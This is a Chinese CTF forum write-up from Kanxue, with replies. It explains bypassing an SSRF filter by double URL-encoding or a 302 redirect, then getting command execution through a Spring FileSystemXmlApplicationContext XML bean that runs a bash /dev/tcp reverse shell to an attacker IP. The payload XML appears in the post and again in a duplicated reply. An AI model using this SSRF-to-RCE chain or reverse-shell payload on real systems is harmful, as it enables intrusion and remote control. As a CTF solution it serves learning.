[原创]第一题至暗时刻-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[原创]第一题至暗时刻

发表于: 2020-11-19 10:57 4673

[原创]第一题至暗时刻

Ha1c9on

2020-11-19 10:57

4673

需要ssrf127.0.0.1的8088端口有正则需要带有 .pediy .com/ 测了一会儿发现使用urlencode两次就可以ssrf了

ca1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3g2)9J5k6e0x3$3i4K6u0W2x3e0b7#2i4K6u0W2x3e0f1%4i4K6y4m8z5o6l9^5z5q4)9J5c8X3N6W2N6r3W2E0j5h3N6W2i4K6y4r3N6i4u0D9i4K6y4p5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5y4e0t1#2x3$3p5^5x3o6R3^5i4K6t1#2x3U0f1K6k6W2)9J5k6i4m8W2k6r3W2&6i4K6u0W2j5$3!0E0i4K6u0r3L8r3!0S2k6p5y4G2L8X3k6A6k6#2)9K6c8Y4g2J5L8q4)9K6c8r3S2@1N6s2m8Q4x3@1q4Q4x3V1k6Q4x3V1k6A6M7q4)9J5c8Y4m8S2P5h3I4G2j5h3c8Q4x3X3g2^5L8h3H3`.

这样也可以绕ssrf 不过需要服务器写一个302跳转
c57K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3g2)9J5k6e0x3$3i4K6u0W2x3e0b7#2i4K6u0W2x3e0f1%4i4K6y4m8z5o6l9^5z5q4)9J5c8X3N6W2N6r3W2E0j5h3N6W2i4K6y4r3N6i4u0D9i4K6y4p5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8W2)9@1x3q4)9@1x3o6p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9K6b7e0p5J5x3K6c8Q4y4o6m8E0i4K6u0W2M7r3g2V1K9i4W2Q4x3X3g2U0L8$3#2Q4x3V1k6D9L8$3q4V1b7$3!0F1k6X3W2Y4i4K6y4r3N6i4u0D9i4K6y4p5K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5y4#2)9J5k6e0m8Q4x3X3f1H3i4K6u0W2x3g2)9J5c8R3`.`.

ssrf成功后发现需要xml

发现可以用FileSystemXmlApplicationContext 命令执行

91cK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2U0L8X3u0D9L8$3N6K6i4K6u0W2j5$3!0E0i4K6u0r3j5h3k6S2L8Y4c8A6i4K6u0r3M7q4)9J5c8U0p5H3z5o6p5#2y4K6t1^5i4K6u0W2K9s2c8E0L8l9`.`.

使用这里的payload拿shell

拿到shell以后把home下的jar下载回来

用jd-gui 反编译拿到flag

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="c79K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4H3M7X3W2F1k6$3k6J5j5h3#2W2N6$3!0J5K9#2)9J5k6h3!0J5k6#2)9J5c8Y4y4U0K9r3g2E0j5g2)9J5c8X3u0W2j5h3&6K6"
    xmlns:xsi="a7aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4M7K6i4K6u0W2L8%4u0Y4i4K6u0r3x3U0l9H3x3g2)9J5c8W2S2y4e0q4y4U0K9r3g2E0j5g2)9J5k6r3W2F1M7%4c8S2L8X3y4W2" xsi:schemaLocation="
     http://49cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4H3M7X3W2F1k6$3k6J5j5h3#2W2N6$3!0J5K9#2)9J5k6h3!0J5k6H3`.`./schema/beans http://365K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4H3M7X3W2F1k6$3k6J5j5h3#2W2N6$3!0J5K9#2)9J5k6h3!0J5k6H3`.`./schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[bash >& /dev/tcp/ip/2333 0>&1]]

登录后可查看完整内容

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

收藏・0

免费・2

支持

最新回复 (3)
KooJiSung 雪币： 357 活跃值： (4498) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 683 粉丝 3 关注私信	KooJiSung 2 楼我的sc.xml HTTP/1.1 200 OK Server: nginx/1.9.4 Date: Thu, 19 Nov 2020 06:55:42 GMT Content-Type: text/xml Content-Length: 550 <?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="831K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4H3M7X3W2F1k6$3k6J5j5h3#2W2N6$3!0J5K9#2)9J5k6h3!0J5k6#2)9J5c8Y4y4U0K9r3g2E0j5g2)9J5c8X3u0W2j5h3&6K6i4K6t1$3M7i4g2G2N6q4)9K6b7R3`.`. xmlns:xsi="130K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4M7K6i4K6u0W2L8%4u0Y4i4K6u0r3x3U0l9H3x3g2)9J5c8W2S2y4e0q4y4U0K9r3g2E0j5g2)9J5k6r3W2F1M7%4c8S2L8X3y4W2i4K6t1$3M7i4g2G2N6q4)9K6b7R3`.`. xsi:schemaLocation="efaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4H3M7X3W2F1k6$3k6J5j5h3#2W2N6$3!0J5K9#2)9J5k6h3!0J5k6#2)9J5c8Y4y4U0K9r3g2E0j5g2)9J5c8X3u0W2j5h3&6K6i4K6t1$3L8X3u0K6M7q4)9K6b7X3S2@1N6s2m8Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2K6M7s2u0A6L8X3N6X3M7X3q4E0k6i4N6G2M7X3E0Q4x3X3g2G2M7X3N6Q4x3V1k6K6j5$3S2W2L8h3q4Q4x3V1k6T1k6h3q4F1M7#2)9J5c8Y4y4H3M7X3W2F1k6#2)9J5k6r3u0W2j5h3&6K6i4K6u0W2P5s2y4V1i4K6t1$3M7i4g2G2N6q4)9K6b7W2)9J5y4X3N6@1i4K6y4n7 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value><![CDATA[bash >& /dev/tcp/ip/2333 0>&1]]></value> </list> </constructor-arg> </bean> </beans> 执行提示 FreeMarker template error 2020-11-19 15:20 0
香草0x00 雪币： 638 活跃值： (795) 能力值： ( LV6，RANK：93 ) 在线值：发帖 4 回帖 12 粉丝 7 关注私信	香草0x00 3 楼虽然报错了，但是执行了呀 2020-11-19 15:37 0
xjklewh 雪币： 405 活跃值： (803) 能力值： ( LV4，RANK：58 ) 在线值：发帖 3 回帖 25 粉丝 3 关注私信	xjklewh 4 楼学习了 2020-11-19 16:28 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Ha1c9on

发帖

回帖

RANK

关注

私信

他的文章

[原创]第一题至暗时刻 4674
[原创]第八题牛刀小试 4412

关于我们

联系我们

企业服务

看雪公众号

最新回复 (3)
KooJiSung 雪币： 357 活跃值： (4498) 能力值： ( LV3，RANK：25 ) 在线值：发帖 8 回帖 683 粉丝 3 关注私信	KooJiSung 2 楼我的sc.xml HTTP/1.1 200 OK Server: nginx/1.9.4 Date: Thu, 19 Nov 2020 06:55:42 GMT Content-Type: text/xml Content-Length: 550 <?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="831K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4H3M7X3W2F1k6$3k6J5j5h3#2W2N6$3!0J5K9#2)9J5k6h3!0J5k6#2)9J5c8Y4y4U0K9r3g2E0j5g2)9J5c8X3u0W2j5h3&6K6i4K6t1$3M7i4g2G2N6q4)9K6b7R3`.`. xmlns:xsi="130K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4M7K6i4K6u0W2L8%4u0Y4i4K6u0r3x3U0l9H3x3g2)9J5c8W2S2y4e0q4y4U0K9r3g2E0j5g2)9J5k6r3W2F1M7%4c8S2L8X3y4W2i4K6t1$3M7i4g2G2N6q4)9K6b7R3`.`. xsi:schemaLocation="efaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4H3M7X3W2F1k6$3k6J5j5h3#2W2N6$3!0J5K9#2)9J5k6h3!0J5k6#2)9J5c8Y4y4U0K9r3g2E0j5g2)9J5c8X3u0W2j5h3&6K6i4K6t1$3L8X3u0K6M7q4)9K6b7X3S2@1N6s2m8Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2K6M7s2u0A6L8X3N6X3M7X3q4E0k6i4N6G2M7X3E0Q4x3X3g2G2M7X3N6Q4x3V1k6K6j5$3S2W2L8h3q4Q4x3V1k6T1k6h3q4F1M7#2)9J5c8Y4y4H3M7X3W2F1k6#2)9J5k6r3u0W2j5h3&6K6i4K6u0W2P5s2y4V1i4K6t1$3M7i4g2G2N6q4)9K6b7W2)9J5y4X3N6@1i4K6y4n7 <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value><![CDATA[bash >& /dev/tcp/ip/2333 0>&1]]></value> </list> </constructor-arg> </bean> </beans> 执行提示 FreeMarker template error 2020-11-19 15:20 0
香草0x00 雪币： 638 活跃值： (795) 能力值： ( LV6，RANK：93 ) 在线值：发帖 4 回帖 12 粉丝 7 关注私信	香草0x00 3 楼虽然报错了，但是执行了呀 2020-11-19 15:37 0
xjklewh 雪币： 405 活跃值： (803) 能力值： ( LV4，RANK：58 ) 在线值：发帖 3 回帖 25 粉丝 3 关注私信	xjklewh 4 楼学习了 2020-11-19 16:28 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]第一题 至暗时刻

[原创]第一题至暗时刻